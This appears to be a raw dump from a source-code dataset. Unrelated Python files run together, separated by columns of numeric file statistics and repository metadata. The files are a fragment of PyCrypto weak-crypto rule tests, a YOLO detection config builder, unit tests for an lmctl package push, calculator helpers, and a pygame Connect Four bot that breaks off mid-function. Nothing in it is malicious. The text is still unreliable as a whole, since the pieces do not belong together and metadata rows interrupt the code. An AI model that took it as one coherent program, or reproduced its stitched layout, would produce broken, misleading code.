    print("PyCrypto -> rule5 -> p_example5_nested_method_call:", decrypt_aes_ecb(get_pbk(g_salt, g_count_lower_1000),
          testRule5c.p_example5_nested_method_call(
              g_password,
              g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule5 -> p_example6_direct_g_variable_access:",
          decrypt_aes_ecb(get_pbk(g_salt, g_count_lower_1000),
                          testRule5c.p_example6_direct_g_variable_access(g_password, g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule5 -> p_example7_indirect_g_variable_access:",
          decrypt_aes_ecb(get_pbk(g_salt, g_count_lower_1000),
                          testRule5c.p_example7_indirect_g_variable_access(g_password, g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule5 -> p_example8_warning_parameter_not_resolvable:",
          decrypt_aes_ecb(get_pbk(g_salt, g_count_lower_1000),
                          testRule5c.p_example8_warning_parameter_not_resolvable(g_password, g_count_lower_1000,
                                                                                 g_plaintext)) == g_plaintext)
    # NOTE(review): label says "n_example1_random_salt" but the method called
    # is n_example1_iterations_eq_1000 — the label appears copied from rule4;
    # confirm the intended wording before fixing the string.
    print("PyCrypto -> rule5 -> n_example1_random_salt:",
          testRule5c.n_example1_iterations_eq_1000(g_password, g_plaintext))
| 83.433884
| 152
| 0.566738
| 2,086
| 20,191
| 4.941515
| 0.045542
| 0.137757
| 0.072565
| 0.151727
| 0.899884
| 0.873205
| 0.842355
| 0.78735
| 0.759701
| 0.685293
| 0
| 0.049745
| 0.357833
| 20,191
| 241
| 153
| 83.780083
| 0.745257
| 0.003913
| 0
| 0.224215
| 0
| 0
| 0.196807
| 0.116234
| 0
| 0
| 0
| 0
| 0
| 1
| 0.013453
| false
| 0.121076
| 0.03139
| 0.004484
| 0.058296
| 0.327354
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
8d1d38a9a445c761ec65d60d9fd0e5efcf40f635
| 7,094
|
py
|
Python
|
xl_tensorflow/models/vision/detection/configs/yolo_config.py
|
Lannister-Xiaolin/xl_tensorflow
|
99e0f458769ee1e45ebf55c789961e40f7d2eeac
|
[
"Apache-2.0"
] | null | null | null |
xl_tensorflow/models/vision/detection/configs/yolo_config.py
|
Lannister-Xiaolin/xl_tensorflow
|
99e0f458769ee1e45ebf55c789961e40f7d2eeac
|
[
"Apache-2.0"
] | 1
|
2020-11-13T18:52:23.000Z
|
2020-11-13T18:52:23.000Z
|
xl_tensorflow/models/vision/detection/configs/yolo_config.py
|
Lannister-Xiaolin/xl_tensorflow
|
99e0f458769ee1e45ebf55c789961e40f7d2eeac
|
[
"Apache-2.0"
] | null | null | null |
from .common import Config
from xl_tensorflow.models.vision.classification.darknet import DarknetConv2D_BN_Leaky, DarknetConv2D
from tensorflow.keras import layers
def default_yolo_config():
    """Return the baseline detection config (yolov3 defaults: FPN, no SPP)."""
    cfg = Config()
    # model identity and input geometry
    cfg.name = "yolov3"
    cfg.image_size = 608
    cfg.anchors_per_grid = 3
    cfg.num_classes = 80
    # ssp module
    cfg.spp = False
    # feature aggregation config: every op list starts empty and is filled in
    # later by get_model_param() via Config.override()
    cfg.agg_method = "fpn"
    cfg.agg_inputs_ops = []
    cfg.backward_ops = []
    cfg.forward_ops = []
    cfg.inlevel_backward_ops = []
    cfg.inlevel_forward_ops = []
    cfg.agg_out_ops = []
    return cfg
def _conv_stack5(base_ops, filters):
    """Five alternating convs: 1x1(f), 3x3(2f), 1x1(f), 3x3(2f), 1x1(f)."""
    return [
        base_ops(filters=filters, kernel_size=1, strides=1),
        base_ops(filters=filters * 2, kernel_size=3, strides=1),
        base_ops(filters=filters, kernel_size=1, strides=1),
        base_ops(filters=filters * 2, kernel_size=3, strides=1),
        base_ops(filters=filters, kernel_size=1, strides=1),
    ]


def _upsample_branch(base_ops, filters):
    """1x1 conv followed by a 2x upsample (one top-down pathway step)."""
    return [base_ops(filters=filters, kernel_size=1, strides=1),
            layers.UpSampling2D()]


def _detection_head(base_ops, filters, yolo_out_size):
    """3x3 conv plus the final linear 1x1 conv emitting the YOLO outputs."""
    return [base_ops(filters=filters, kernel_size=3, strides=1),
            DarknetConv2D(filters=yolo_out_size, kernel_size=1, strides=1)]


def get_model_param(model_name='yolov4', num_anchors=3, num_classes=80, base_ops=DarknetConv2D_BN_Leaky):
    """Return the aggregation/head op lists for the requested YOLO variant.

    Args:
        model_name: 'yolov4' or 'yolov3'.
        num_anchors: anchors predicted per grid cell.
        num_classes: number of object classes.
        base_ops: conv building block (conv + BN + leaky ReLU by default).

    Returns:
        dict of Config overrides; op lists are ordered p1->p7 unless noted.

    Raises:
        KeyError: for an unknown model_name (preserves the original dict
            lookup's failure mode).
    """
    # per anchor: 4 box coords + 1 objectness score + one score per class
    yolo_out_size = (num_classes + 5) * num_anchors
    # Build only the requested variant: the original constructed the layer
    # objects for BOTH models eagerly and threw the unused ones away.
    if model_name == "yolov4":
        return dict(
            name="yolov4",
            agg_method="panet",
            spp=True,
            # all config order as from p1->p7 direction
            agg_inputs_ops=[
                [base_ops(filters=128, kernel_size=1, strides=1)],
                [base_ops(filters=256, kernel_size=1, strides=1)],
                [base_ops(filters=512, kernel_size=1, strides=1)]
            ],
            # all config order as from p7->p1 direction
            backward_ops=[_upsample_branch(base_ops, 256),
                          _upsample_branch(base_ops, 128)],
            # all config order as from p1->p7 direction
            forward_ops=[
                [layers.ZeroPadding2D(((1, 0), (1, 0))), base_ops(filters=256, kernel_size=3, strides=2)],
                [layers.ZeroPadding2D(((1, 0), (1, 0))), base_ops(filters=512, kernel_size=3, strides=2)]
            ],
            # all config order as from p7->p1 direction
            inlevel_backward_ops=[[],
                                  _conv_stack5(base_ops, 256),
                                  _conv_stack5(base_ops, 128)],
            # all config order as from p1->p7 direction
            inlevel_forward_ops=[[],
                                 _conv_stack5(base_ops, 256),
                                 _conv_stack5(base_ops, 512)],
            # all config order as from p1->p7 direction
            agg_out_ops=[_detection_head(base_ops, 256, yolo_out_size),
                         _detection_head(base_ops, 512, yolo_out_size),
                         _detection_head(base_ops, 1024, yolo_out_size)]
        )
    if model_name == "yolov3":
        # NOTE: forward_ops / inlevel_forward_ops are deliberately absent so
        # the empty defaults from default_yolo_config() stay in effect.
        return dict(
            name="yolov3",
            agg_method="fpn",
            spp=False,
            agg_inputs_ops=[[], [], []],
            backward_ops=[_upsample_branch(base_ops, 256),
                          _upsample_branch(base_ops, 128)],
            inlevel_backward_ops=[_conv_stack5(base_ops, 512),
                                  _conv_stack5(base_ops, 256),
                                  _conv_stack5(base_ops, 128)],
            # all config order as from p1->p7 direction
            agg_out_ops=[_detection_head(base_ops, 256, yolo_out_size),
                         _detection_head(base_ops, 512, yolo_out_size),
                         _detection_head(base_ops, 1024, yolo_out_size)]
        )
    # unknown model: same exception type callers saw from the original dict lookup
    raise KeyError(model_name)
def get_yolo_config(model_name='yolov4', num_anchors=3, num_classes=80, base_ops=DarknetConv2D_BN_Leaky):
    """Get the default config for yolo based on model name."""
    config = default_yolo_config()
    overrides = get_model_param(model_name=model_name, num_anchors=num_anchors,
                                num_classes=num_classes, base_ops=base_ops)
    config.override(overrides)
    return config
| 45.474359
| 112
| 0.524105
| 812
| 7,094
| 4.35468
| 0.098522
| 0.158371
| 0.197964
| 0.161199
| 0.7681
| 0.757636
| 0.750566
| 0.750566
| 0.738688
| 0.693722
| 0
| 0.072703
| 0.367917
| 7,094
| 155
| 113
| 45.767742
| 0.712756
| 0.058641
| 0
| 0.595588
| 0
| 0
| 0.007959
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.022059
| false
| 0
| 0.022059
| 0
| 0.066176
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8d4501929f311e2ea9716d10c251dcb555cd9f90
| 8,121
|
py
|
Python
|
tests/unit/project_lifecycle/project/typetests/test_push.py
|
manojn97/lmctl
|
844925cb414722351efac90cb97f10c1185eef7a
|
[
"Apache-2.0"
] | 3
|
2021-07-19T09:46:01.000Z
|
2022-03-07T13:51:25.000Z
|
tests/unit/project_lifecycle/project/typetests/test_push.py
|
manojn97/lmctl
|
844925cb414722351efac90cb97f10c1185eef7a
|
[
"Apache-2.0"
] | 43
|
2019-08-27T12:36:29.000Z
|
2020-08-27T14:50:40.000Z
|
tests/unit/project_lifecycle/project/typetests/test_push.py
|
manojn97/lmctl
|
844925cb414722351efac90cb97f10c1185eef7a
|
[
"Apache-2.0"
] | 7
|
2020-09-22T20:32:17.000Z
|
2022-03-29T12:25:51.000Z
|
import unittest
from unittest.mock import call
import os
import tests.common.simulations.project_lab as project_lab
from tests.common.project_testing import (ProjectSimTestCase, PROJECT_CONTAINS_DIR)
from lmctl.project.sessions import EnvironmentSessions
from lmctl.project.package.core import Pkg, PkgContent, PushOptions
class TestPushTestPkgs(ProjectSimTestCase):
    """Unit tests for pushing "type" project packages to a mocked LM environment.

    Each test builds a simulated package via ``self.simlab``, runs
    ``Pkg.push`` and then asserts on the calls the push made against the
    mocked session's descriptor/behaviour drivers.
    """

    def _push(self, pkg_sim, lm_sim):
        # Shared push flow: mock the session, push the package, verify the
        # result type, and return the session for driver-call assertions.
        session = lm_sim.as_mocked_session()
        env_sessions = EnvironmentSessions(session)
        content = Pkg(pkg_sim.path).push(env_sessions, PushOptions())
        self.assertIsInstance(content, PkgContent)
        return session

    def test_push_creates_descriptor(self):
        """Pushing a basic package creates its descriptor when absent."""
        pkg_sim = self.simlab.simulate_pkg_type_basic()
        session = self._push(pkg_sim, self.simlab.simulate_lm())
        session.descriptor_driver.get_descriptor.assert_called_once_with('type::basic::1.0')
        session.descriptor_driver.create_descriptor.assert_called_once_with('name: type::basic::1.0\ndescription: descriptor for basic\n')

    def test_push_updates_descriptors_if_exists(self):
        """Pushing over an existing descriptor updates it instead of re-creating."""
        pkg_sim = self.simlab.simulate_pkg_type_basic()
        lm_sim = self.simlab.simulate_lm()
        lm_sim.add_descriptor('name: type::basic::1.0\ndescription: pre-update descriptor for basic\n')
        session = self._push(pkg_sim, lm_sim)
        session.descriptor_driver.get_descriptor.assert_called_once_with('type::basic::1.0')
        session.descriptor_driver.create_descriptor.assert_not_called()
        session.descriptor_driver.update_descriptor.assert_called_once_with('type::basic::1.0', 'name: type::basic::1.0\ndescription: descriptor for basic\n')

    def test_push_creates_behaviour_configuration(self):
        """Pushing a package with behaviour creates its assembly configuration."""
        pkg_sim = self.simlab.simulate_pkg_type_with_behaviour()
        session = self._push(pkg_sim, self.simlab.simulate_lm())
        session.behaviour_driver.create_assembly_configuration.assert_called_once_with({
            "name": "simple",
            "projectId": "type::with_behaviour::1.0",
            "description": "a simple assembly config",
            "properties": {
                "a": "123"
            },
            "createdAt": "2019-01-01T01:00:00.613Z",
            "lastModifiedAt": "2019-01-02T01:00:00.613Z",
            "descriptorName": "type::with_behaviour::1.0"
        })

    def test_push_updates_behaviour_configuration_if_exists(self):
        """An existing assembly configuration is updated, not re-created."""
        pkg_sim = self.simlab.simulate_pkg_type_with_behaviour()
        lm_sim = self.simlab.simulate_lm()
        lm_sim.add_project({'id': 'type::with_behaviour::1.0', 'name': 'type::with_behaviour::1.0'})
        lm_sim.add_assembly_configuration({'id': 'existing', 'projectId': 'type::with_behaviour::1.0', 'name': 'simple'})
        session = self._push(pkg_sim, lm_sim)
        session.behaviour_driver.create_assembly_configuration.assert_not_called()
        session.behaviour_driver.update_assembly_configuration.assert_called_once_with({
            "id": "existing",
            "name": "simple",
            "projectId": "type::with_behaviour::1.0",
            "description": "a simple assembly config",
            "properties": {
                "a": "123"
            },
            "createdAt": "2019-01-01T01:00:00.613Z",
            "lastModifiedAt": "2019-01-02T01:00:00.613Z",
            "descriptorName": "type::with_behaviour::1.0"
        })

    def test_push_creates_behaviour_scenarios(self):
        """Pushing a package with behaviour creates its scenarios."""
        pkg_sim = self.simlab.simulate_pkg_type_with_behaviour()
        lm_sim = self.simlab.simulate_lm()
        lm_sim.add_project({'id': 'type::with_behaviour::1.0', 'name': 'type::with_behaviour::1.0'})
        lm_sim.add_assembly_configuration({'id': 'existing', 'projectId': 'type::with_behaviour::1.0', 'name': 'simple'})
        session = self._push(pkg_sim, lm_sim)
        session.behaviour_driver.create_scenario.assert_has_calls([
            call({
                "name": "test",
                "projectId": "type::with_behaviour::1.0",
                "description": "a test scenario",
                "stages": [
                    {
                        "name": "Stage One",
                        "steps": [
                            {
                                "stepDefinitionName": "Utilities::SleepForTime",
                                "properties": {
                                    "sleepTime": "20",
                                    "timeUnit": "seconds"
                                }
                            }
                        ]
                    }
                ],
                "assemblyActors": [
                    {
                        "instanceName": "simple",
                        "assemblyConfigurationId": "existing",
                        "initialState": "Active",
                        "uninstallOnExit": True,
                        "provided": False
                    }
                ],
                "createdAt": "2019-01-01T01:00:00.613Z",
                "lastModifiedAt": "2019-01-02T01:00:00.613Z"
            })
        ])

    def test_push_updates_behaviour_scenarios_if_exists(self):
        """Existing scenarios are updated, not re-created."""
        pkg_sim = self.simlab.simulate_pkg_type_with_behaviour()
        lm_sim = self.simlab.simulate_lm()
        lm_sim.add_project({'id': 'type::with_behaviour::1.0', 'name': 'type::with_behaviour::1.0'})
        lm_sim.add_assembly_configuration({'id': 'existing', 'projectId': 'type::with_behaviour::1.0', 'name': 'simple'})
        lm_sim.add_scenario({'id': 'existingRuntime', 'projectId': 'type::with_behaviour::1.0', 'name': 'runtime'})
        lm_sim.add_scenario({'id': 'existingTest', 'projectId': 'type::with_behaviour::1.0', 'name': 'test'})
        session = self._push(pkg_sim, lm_sim)
        session.behaviour_driver.create_scenario.assert_not_called()
        session.behaviour_driver.update_scenario.assert_has_calls([
            call({
                "id": "existingTest",
                "name": "test",
                "projectId": "type::with_behaviour::1.0",
                "description": "a test scenario",
                "stages": [
                    {
                        "name": "Stage One",
                        "steps": [
                            {
                                "stepDefinitionName": "Utilities::SleepForTime",
                                "properties": {
                                    "sleepTime": "20",
                                    "timeUnit": "seconds"
                                }
                            }
                        ]
                    }
                ],
                "assemblyActors": [
                    {
                        "instanceName": "simple",
                        "assemblyConfigurationId": "existing",
                        "initialState": "Active",
                        "uninstallOnExit": True,
                        "provided": False
                    }
                ],
                "createdAt": "2019-01-01T01:00:00.613Z",
                "lastModifiedAt": "2019-01-02T01:00:00.613Z"
            })
        ])
| 46.942197
| 161
| 0.581332
| 821
| 8,121
| 5.464068
| 0.138855
| 0.046144
| 0.079581
| 0.068212
| 0.882746
| 0.842844
| 0.824565
| 0.810299
| 0.792911
| 0.783772
| 0
| 0.033761
| 0.299717
| 8,121
| 173
| 162
| 46.942197
| 0.755055
| 0
| 0
| 0.722892
| 0
| 0
| 0.221867
| 0.098375
| 0
| 0
| 0
| 0
| 0.10241
| 1
| 0.036145
| false
| 0
| 0.042169
| 0
| 0.084337
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a5c75ff91fcbe8c201918760a5aa94a10d22af91
| 471
|
py
|
Python
|
calculator/helpers.py
|
akshayvaidya/python-calculator
|
d07272b8ba8f15ebec0eb516673bde39138d5987
|
[
"MIT"
] | null | null | null |
calculator/helpers.py
|
akshayvaidya/python-calculator
|
d07272b8ba8f15ebec0eb516673bde39138d5987
|
[
"MIT"
] | null | null | null |
calculator/helpers.py
|
akshayvaidya/python-calculator
|
d07272b8ba8f15ebec0eb516673bde39138d5987
|
[
"MIT"
] | null | null | null |
def add(a, b):
    """Return ``a + b`` when both operands are numeric (int or float).

    Non-numeric input is not an error: the function returns ``None``,
    matching the error style of the other calculator helpers.
    """
    if isinstance(a, (int, float)) and isinstance(b, (int, float)):
        return a + b
    # Explicit None instead of a bare `return` so the fallback is obvious.
    return None
def sub(a, b):
    """Return ``a - b`` when both operands are numeric (int or float).

    Returns ``None`` for non-numeric input, matching the other helpers.
    """
    if isinstance(a, (int, float)) and isinstance(b, (int, float)):
        return a - b
    # Explicit None instead of a bare `return` so the fallback is obvious.
    return None
def mul(a, b):
    """Return ``a * b`` when both operands are numeric (int or float).

    Returns ``None`` for non-numeric input, matching the other helpers.
    """
    if isinstance(a, (int, float)) and isinstance(b, (int, float)):
        return a * b
    # Explicit None instead of a bare `return` so the fallback is obvious.
    return None
def div(a, b):
    """Return ``a / b`` (true division) when both operands are numeric
    and ``b`` is non-zero; otherwise return ``None``.

    Division by zero is reported as ``None`` instead of raising
    ``ZeroDivisionError``, consistent with the other helpers' error style.
    """
    if isinstance(a, (int, float)) and isinstance(b, (int, float)) and b != 0:
        return a / b
    # Explicit None instead of a bare `return` so the fallback is obvious.
    return None
| 22.428571
| 76
| 0.562633
| 75
| 471
| 3.533333
| 0.186667
| 0.060377
| 0.207547
| 0.211321
| 0.871698
| 0.871698
| 0.871698
| 0.871698
| 0.871698
| 0.871698
| 0
| 0.00295
| 0.280255
| 471
| 21
| 77
| 22.428571
| 0.778761
| 0
| 0
| 0.4375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0
| 0
| 0.75
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
a5e7e7ab428cb89c84ab48c2f01039b52a630ba1
| 68,613
|
py
|
Python
|
main.py
|
kindanoob/pyconnect_four
|
ce2068b5afb2660015f8ad8ef6ef1eb9f32cfa47
|
[
"MIT"
] | null | null | null |
main.py
|
kindanoob/pyconnect_four
|
ce2068b5afb2660015f8ad8ef6ef1eb9f32cfa47
|
[
"MIT"
] | null | null | null |
main.py
|
kindanoob/pyconnect_four
|
ce2068b5afb2660015f8ad8ef6ef1eb9f32cfa47
|
[
"MIT"
] | null | null | null |
import sys
import random
import time
import pygame
import pygame.locals
# --- Minimax search parameters ---
INFINITY = 1000000
# NOTE(review): constant name is misspelled ("INIFINITY"); kept as-is because
# code later in the file may reference this exact name.
SMALL_INIFINITY = 1000
MINIMAX_DEPTH = 7
# Initial alpha/beta bounds for alpha-beta pruning.
ALPHA_0 = -INFINITY
BETA_0 = INFINITY
# --- Window and board geometry (pixels) ---
WINDOWWIDTH = 640
WINDOWHEIGHT = 480
BOARDWIDTH = 350
BOARDHEIGHT = 350
# NOTE(review): true division yields floats here (Python 3); pygame accepts
# float coordinates in recent versions, but integer margins may have been
# intended — confirm against the drawing code.
X_MARGIN = (WINDOWWIDTH - BOARDWIDTH) / 2
Y_MARGIN = (WINDOWHEIGHT - BOARDHEIGHT) / 2
SQUARE_SIZE = BOARDWIDTH / 7
DISC_RADIUS = int(SQUARE_SIZE * 0.4)
# --- Font sizes for on-screen texts ---
TEXT_SIZE = 40
TEXT_SIZE_FIRST_MOVE = 22
TEXT_SIZE_PLAY_AGAIN = int(SQUARE_SIZE * 0.5)
TEXT_SIZE_GAME_RESULT = int(SQUARE_SIZE * 0.75)
#colors
BLACK = (0, 0, 0)
WHITE = (255, 255, 255)
RED = (250, 10, 10)
GREEN = (0, 255, 0)
BLUE = (0, 0, 255)
YELLOW = (250, 250, 10)
#BACKGROUND_COLOR = (0, 255, 150)
BACKGROUND_COLOR = (100, 100, 100)
BOARD_COLOR = (60, 60, 250)
class Game_window:
    """Thin wrapper that initialises pygame and opens the main window.

    The created surface is exposed as ``self.window``.
    """

    def __init__(self):
        """Start pygame, open the display at the configured size and title it."""
        pygame.init()
        size = (WINDOWWIDTH, WINDOWHEIGHT)
        self.window = pygame.display.set_mode(size)
        pygame.display.set_caption("Four in a row")
class Bot:
def __init__(self):
self.timebank = None
self.time_per_move = None
self.player_names = None
self.bot_name = None
self.bot_id = None
self.color = None
self.num_cols = 7
self.num_rows = 6
self.round = None
self.board = [["0"] * self.num_cols for i in range(self.num_rows)]
self.window = Game_window()
self.is_finished = False
self.move_number = 0
self.play_again = True
def store_settings(self, msg):
self.timebank = int(msg[2])
#print("set timebank to {}, type: {}".format(self.timebank, type(self.timebank)))
self.time_per_move = int(sys.stdin.readline().strip().split(" ")[2])
#print("set time_per_move to {}".format(self.time_per_move))
self.player_names = sys.stdin.readline().strip().split(" ")[2]
#print("set player_names to {}".format(self.player_names))
self.bot_name = sys.stdin.readline().strip().split(" ")[2]
#print("set bot_name to {}".format(self.bot_name))
self.bot_id = sys.stdin.readline().strip().split(" ")[2]
if (self.bot_id == "1"): self.color = 1
else: self.color = -1
#print("set bot_id to {}".format(self.bot_id))
self.num_cols = int(sys.stdin.readline().strip().split(" ")[2])
#print("set num_cols to {}".format(self.num_cols))
self.num_rows = int(sys.stdin.readline().strip().split(" ")[2])
#print("set num_rows to {}".format(self.num_rows))
self.board = [[0] * self.num_cols for i in range(self.num_rows)]
#self.board = [[0] * self.num_cols for i in range(self.num_rows)]
#print("initial board state: {}".format(self.board))
def update(self, msg):
if (msg[2] == "round"):
#self.board = [[0] * self.num_cols for i in range(self.num_rows)]
# print("initial board state: {}".format(self.board))
self.round = int(msg[3])
elif (msg[2] == "field"):
#print("set round number to {}".format(self.round))
#a = (sys.stdin.readline().split(" "))[3].split(";")
a = msg[3].split(";")
#print("a = {}".format(a))
for i in range(self.num_rows):
b = a[i].split(",")
for j in range(self.num_cols):
self.board[i][j] = b[j]
#print("elem: {}, type: {}".format(self.board[0][0], type(self.board[0][0])))
#print("updated board state: {}".format(self.board))
def eval_board(self, l_color):
# the higher is returned score, the better for the first player
num_threats_first = 0
num_threats_second = 0
# check for bottom_left -> top_right diagonal threats
if (self.board[3][0] == self.board[2][1] == self.board[1][2] == '1' and self.board[0][3] == '0'): num_threats_first += 1
if (self.board[3][0] == '0' and self.board[2][1] == self.board[1][2] == self.board[0][3] == '1'): num_threats_first += 1
if (self.board[3][0] == self.board[1][2] == self.board[0][3] == '1' and self.board[2][1] == '0'): num_threats_first += 1
if (self.board[3][0] == self.board[2][1] == self.board[0][3] == '1' and self.board[1][2] == '0'): num_threats_first += 1
if (self.board[3][0] == self.board[2][1] == self.board[1][2] == '2' and self.board[0][3] == '0'): num_threats_second += 1
if (self.board[3][0] == '0' and self.board[2][1] == self.board[1][2] == self.board[0][3] == '2'): num_threats_second += 1
if (self.board[3][0] == self.board[1][2] == self.board[0][3] == '2' and self.board[2][1] == '0'): num_threats_second += 1
if (self.board[3][0] == self.board[2][1] == self.board[0][3] == '2' and self.board[1][2] == '0'): num_threats_second += 1
if (self.board[4][0] == self.board[3][1] == self.board[2][2] == '1' and self.board[1][3] == '0'): num_threats_first += 1
if (self.board[4][0] == '0' and self.board[3][1] == self.board[2][2] == self.board[1][3] == '1'): num_threats_first += 1
if (self.board[4][0] == self.board[2][2] == self.board[1][3] == '1' and self.board[3][1] == '0'): num_threats_first += 1
if (self.board[4][0] == self.board[3][1] == self.board[1][3] == '1' and self.board[2][2] == '0'): num_threats_first += 1
if (self.board[4][0] == self.board[3][1] == self.board[2][2] == '2' and self.board[1][3] == '0'): num_threats_second += 1
if (self.board[4][0] == '0' and self.board[3][1] == self.board[2][2] == self.board[1][3] == '2'): num_threats_second += 1
if (self.board[4][0] == self.board[2][2] == self.board[1][3] == '2' and self.board[3][1] == '0'): num_threats_second += 1
if (self.board[4][0] == self.board[3][1] == self.board[1][3] == '2' and self.board[2][2] == '0'): num_threats_second += 1
if (self.board[3][1] == self.board[2][2] == self.board[1][3] == '1' and self.board[0][4] == '0'): num_threats_first += 1
if (self.board[3][1] == '0' and self.board[2][2] == self.board[1][3] == self.board[0][4] == '1'): num_threats_first += 1
if (self.board[3][1] == self.board[1][3] == self.board[0][4] == '1' and self.board[2][2] == '0'): num_threats_first += 1
if (self.board[3][1] == self.board[2][2] == self.board[0][4] == '1' and self.board[1][3] == '0'): num_threats_first += 1
if (self.board[3][1] == self.board[2][2] == self.board[1][3] == '2' and self.board[0][4] == '0'): num_threats_second += 1
if (self.board[3][1] == '0' and self.board[2][2] == self.board[1][3] == self.board[0][4] == '2'): num_threats_second += 1
if (self.board[3][1] == self.board[1][3] == self.board[0][4] == '2' and self.board[2][2] == '0'): num_threats_second += 1
if (self.board[3][1] == self.board[2][2] == self.board[0][4] == '2' and self.board[1][3] == '0'): num_threats_second += 1
if (self.board[5][0] == self.board[4][1] == self.board[3][2] == '1' and self.board[2][3] == '0'): num_threats_first += 1
if (self.board[5][0] == '0' and self.board[4][1] == self.board[3][2] == self.board[2][3] == '1'): num_threats_first += 1
if (self.board[5][0] == self.board[4][1] == self.board[2][3] == '1' and self.board[3][2] == '0'): num_threats_first += 1
if (self.board[5][0] == self.board[3][2] == self.board[2][3] == '1' and self.board[4][1] == '0'): num_threats_first += 1
if (self.board[5][0] == self.board[4][1] == self.board[3][2] == '2' and self.board[2][3] == '0'): num_threats_second += 1
if (self.board[5][0] == '0' and self.board[4][1] == self.board[3][2] == self.board[2][3] == '2'): num_threats_second += 1
if (self.board[5][0] == self.board[4][1] == self.board[2][3] == '2' and self.board[3][2] == '0'): num_threats_second += 1
if (self.board[5][0] == self.board[3][2] == self.board[2][3] == '2' and self.board[4][1] == '0'): num_threats_second += 1
if (self.board[4][1] == self.board[3][2] == self.board[2][3] == '1' and self.board[1][4] == '0'): num_threats_first += 1
if (self.board[4][1] == '0' and self.board[3][2] == self.board[2][3] == self.board[1][4] == '1'): num_threats_first += 1
if (self.board[4][1] == self.board[2][3] == self.board[1][4] == '1' and self.board[3][2] == '0'): num_threats_first += 1
if (self.board[4][1] == self.board[3][2] == self.board[1][4] == '1' and self.board[2][3] == '0'): num_threats_first += 1
if (self.board[4][1] == self.board[3][2] == self.board[2][3] == '2' and self.board[1][4] == '0'): num_threats_second += 1
if (self.board[4][1] == '0' and self.board[3][2] == self.board[2][3] == self.board[1][4] == '2'): num_threats_second += 1
if (self.board[4][1] == self.board[2][3] == self.board[1][4] == '2' and self.board[3][2] == '0'): num_threats_second += 1
if (self.board[4][1] == self.board[3][2] == self.board[1][4] == '2' and self.board[2][3] == '0'): num_threats_second += 1
if (self.board[3][2] == self.board[2][3] == self.board[1][4] == '1' and self.board[0][5] == '0'): num_threats_first += 1
if (self.board[3][2] == '0' and self.board[2][3] == self.board[1][4] == self.board[0][5] == '1'): num_threats_first += 1
if (self.board[3][2] == self.board[1][4] == self.board[0][5] == '1' and self.board[2][3] == '0'): num_threats_first += 1
if (self.board[3][2] == self.board[2][3] == self.board[0][5] == '1' and self.board[1][4] == '0'): num_threats_first += 1
if (self.board[3][2] == self.board[2][3] == self.board[1][4] == '2' and self.board[0][5] == '0'): num_threats_second += 1
if (self.board[3][2] == '0' and self.board[2][3] == self.board[1][4] == self.board[0][5] == '2'): num_threats_second += 1
if (self.board[3][2] == self.board[1][4] == self.board[0][5] == '2' and self.board[2][3] == '0'): num_threats_second += 1
if (self.board[3][2] == self.board[2][3] == self.board[0][5] == '2' and self.board[1][4] == '0'): num_threats_second += 1
if (self.board[5][1] == self.board[4][2] == self.board[3][3] == '1' and self.board[2][4] == '0'): num_threats_first += 1
if (self.board[5][1] == '0' and self.board[4][2] == self.board[3][3] == self.board[2][4] == '1'): num_threats_first += 1
if (self.board[5][1] == self.board[3][3] == self.board[2][4] == '1' and self.board[4][2] == '0'): num_threats_first += 1
if (self.board[5][1] == self.board[4][2] == self.board[2][4] == '1' and self.board[3][3] == '0'): num_threats_first += 1
if (self.board[5][1] == self.board[4][2] == self.board[3][3] == '2' and self.board[2][4] == '0'): num_threats_second += 1
if (self.board[5][1] == '0' and self.board[4][2] == self.board[3][3] == self.board[2][4] == '2'): num_threats_second += 1
if (self.board[5][1] == self.board[3][3] == self.board[2][4] == '2' and self.board[4][2] == '0'): num_threats_second += 1
if (self.board[5][1] == self.board[4][2] == self.board[2][4] == '2' and self.board[3][3] == '0'): num_threats_second += 1
if (self.board[4][2] == self.board[3][3] == self.board[2][4] == '1' and self.board[1][5] == '0'): num_threats_first += 1
if (self.board[4][2] == '0' and self.board[3][3] == self.board[2][4] == self.board[1][5] == '1'): num_threats_first += 1
if (self.board[4][2] == self.board[2][4] == self.board[1][5] == '1' and self.board[3][3] == '0'): num_threats_first += 1
if (self.board[4][2] == self.board[3][3] == self.board[1][5] == '1' and self.board[2][4] == '0'): num_threats_first += 1
if (self.board[4][2] == self.board[3][3] == self.board[2][4] == '2' and self.board[1][5] == '0'): num_threats_second += 1
if (self.board[4][2] == '0' and self.board[3][3] == self.board[2][4] == self.board[1][5] == '2'): num_threats_second += 1
if (self.board[4][2] == self.board[2][4] == self.board[1][5] == '2' and self.board[3][3] == '0'): num_threats_second += 1
if (self.board[4][2] == self.board[3][3] == self.board[1][5] == '2' and self.board[2][4] == '0'): num_threats_second += 1
if (self.board[3][3] == self.board[2][4] == self.board[1][5] == '1' and self.board[0][6] == '0'): num_threats_first += 1
if (self.board[3][3] == '0' and self.board[2][4] == self.board[1][5] == self.board[0][6] == '1'): num_threats_first += 1
if (self.board[3][3] == self.board[1][5] == self.board[0][6] == '1' and self.board[2][4] == '0'): num_threats_first += 1
